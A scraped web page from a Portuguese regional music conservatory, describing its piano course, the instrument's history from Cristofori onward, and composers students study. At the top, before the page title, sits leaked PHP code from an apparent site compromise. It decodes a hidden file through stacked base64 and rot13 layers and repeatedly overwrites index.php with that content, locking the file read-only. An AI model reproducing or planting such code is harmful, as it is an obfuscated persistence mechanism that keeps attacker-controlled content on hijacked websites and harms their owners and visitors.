$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Piano – Conservatório Regional do Baixo Alentejo

Piano

Desde sobretudo o século XIX que o Piano se afirmou como um dos instrumentos mais populares junto dos jovens aspirantes a estudantes de música. Símbolo cultural, então, de uma burguesia em rápida ascensão, a sua presença era essencial no decorrer das soirées características dos salões burgueses oitocentistas. Herdeiro direto do cravo (instrumento de tecla com corda beliscada), o piano foi inventado pelo italiano Bartolomeo Cristofori (1655 – 1731) que desenvolveu um novo sistema de ataque às cordas baseado na sua percussão através de pequenos martelos (ao invés de serem beliscadas, como no cravo), sistema este que permitiu ao novo instrumento emitir sons com diferentes gamas de intensidade – do mais piano (suave), ao mais forte (intenso). Rapidamente o novo instrumento foi batizado de “pianoforte” (simplificado atualmente para “piano”). Ao longo da história da música foram inúmeros os compositores que se dedicaram a este instrumento e que os alunos de Piano aprenderão a conhecer e interpretar durante o curso, compositores como, por exemplo, Wolfgang Amadeus Mozart (1756 – 1791), Ludwig van Beethoven (1770 – 1827), Frédéric Chopin (1810 – 1849) e Franz Liszt (1811 – 1886), entre muitos outros.